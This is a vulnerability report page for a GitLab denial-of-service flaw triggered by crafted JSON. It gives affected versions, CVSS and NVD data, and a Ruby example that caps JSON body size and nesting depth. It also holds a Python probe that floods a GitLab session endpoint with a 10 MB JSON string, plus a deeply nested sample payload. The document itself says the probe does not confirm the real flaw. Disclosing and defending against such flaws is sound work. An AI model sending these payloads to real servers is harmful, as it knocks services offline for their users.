Security Vulnerability Report
CVE-2025-14870 CVSS 7.5 HIGH

CVE-2025-14870

Published: 2026-05-14 06:16:21
Last Modified: 2026-05-14 16:20:43

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.5 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to cause denial of service by sending specially crafted JSON payloads due to insufficient input validation.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No CPE configuration data is available yet (the NVD record is still "Undergoing Analysis"); the affected ranges below are taken from the vendor description.

GitLab CE/EE >= 18.5, < 18.9.7
GitLab CE/EE >= 18.10, < 18.10.6
GitLab CE/EE >= 18.11, < 18.11.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import json

import requests

# Exploit Title: GitLab CE/EE DoS via Crafted JSON
# Date: 2026-05-14
# Exploit Author: Analyst

# Placeholder target; point this at an instance you are authorized to test.
target_url = "http://target-gitlab-instance.com/api/v4/session"

# One JSON object whose single value is a 10 MB string (not a nested structure).
# The advisory does not disclose the actual payload shape, so this is a generic
# oversized-body probe against the endpoint's request handling, not a confirmed
# reproduction of the reported flaw.
data = {"key": "A" * 10000000}
headers = {"Content-Type": "application/json"}

try:
    print("Sending malicious payload...")
    response = requests.post(target_url, data=json.dumps(data), headers=headers, timeout=10)
    print(f"Response Status: {response.status_code}")
except requests.exceptions.RequestException as e:
    # A timeout or dropped connection is only a weak signal; confirm with
    # server-side metrics (CPU, memory, worker restarts) before calling it a DoS.
    print(f"Potential DoS triggered or connection lost: {e}")
```
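The description and the CWE-770 weakness (allocation of resources without limits) point at the defensive side of this report: a JSON endpoint reachable before authentication must bound what it accepts before it parses anything. The following is an added example, not GitLab's code and not taken from the patch; it shows a Rack-shaped intake (GitLab is a Rails application) that caps the declared and actual body size and the JSON nesting depth, and it exercises both an oversized payload like the probe above and a deeply nested one. The byte and depth limits, the `PayloadRejected` class and the `check_json_request` helper are illustrative assumptions.

```ruby
require 'json'
require 'stringio'

# Added example (not GitLab's code): bound JSON request bodies before parsing.
# CWE-770 is resource allocation without limits; for a JSON endpoint the two
# limits that matter are body size and nesting depth. Both thresholds are
# illustrative assumptions, not values taken from GitLab.
MAX_BODY_BYTES = 64 * 1024   # assumed per-request body cap
MAX_NESTING    = 32          # assumed depth cap (Ruby's JSON default is 100)

class PayloadRejected < StandardError; end

# Reads at most max_bytes + 1 from the input so an oversized body is detected
# without buffering all of it (a lying Content-Length header does not help the
# sender), then parses with a depth limit. Takes a Rack-shaped env hash
# (CONTENT_LENGTH, rack.input) so it can sit in front of authentication.
def parse_bounded_json(env, max_bytes: MAX_BODY_BYTES, max_nesting: MAX_NESTING)
  declared = env['CONTENT_LENGTH'].to_i
  raise PayloadRejected, "declared length #{declared} exceeds #{max_bytes}" if declared > max_bytes

  body = env['rack.input'].read(max_bytes + 1) || ''
  raise PayloadRejected, "body exceeds #{max_bytes} bytes" if body.bytesize > max_bytes

  JSON.parse(body, max_nesting: max_nesting)
rescue JSON::NestingError
  # NestingError is a ParserError subclass, so it must be rescued first.
  raise PayloadRejected, "nesting deeper than #{max_nesting}"
rescue JSON::ParserError => e
  raise PayloadRejected, "malformed JSON: #{e.message[0, 60]}"
end

# Wraps a body in a minimal Rack-like env and returns [:ok, parsed] or
# [:rejected, reason]. content_length defaults to the true size; pass a
# smaller value to simulate a client that under-reports it.
def check_json_request(body, content_length: body.bytesize)
  env = { 'CONTENT_LENGTH' => content_length.to_s, 'rack.input' => StringIO.new(body) }
  [:ok, parse_bounded_json(env)]
rescue PayloadRejected => e
  [:rejected, e.message]
end

# Constructed sample payloads (not captured traffic).
OVERSIZED = JSON.generate({ 'key' => 'A' * (MAX_BODY_BYTES + 1) })  # same shape as the probe above
DEEP      = '[' * 500 + ']' * 500                                      # 500 nested arrays, ~1 KB
NORMAL    = JSON.generate({ 'login' => 'alice', 'password' => 'hunter2' })

if __FILE__ == $PROGRAM_NAME
  [['normal', NORMAL], ['oversized', OVERSIZED], ['deep', DEEP]].each do |name, body|
    status, detail = check_json_request(body)
    puts "#{name}: #{status} (#{detail.is_a?(String) ? detail : detail.keys.join(',')})"
  end
end
```

The depth limit matters as much as the size limit: the nested payload is only about a kilobyte, so a size cap alone would let it through, while a recursive parser without a depth bound does unbounded work on it. Whether GitLab's actual flaw was a size or a depth issue is not stated in the report; the example bounds both because either one is a CWE-770 gap.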

References

https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
https://gitlab.com/gitlab-org/gitlab/-/work_items/584490
https://hackerone.com/reports/3446641

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14870", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:20.887", "lastModified": "2026-05-14T16:20:43.240", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.5 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to cause denial of service by sending specially crafted JSON payloads due to insufficient input validation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/584490", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/3446641", "source": "[email protected]"}]}}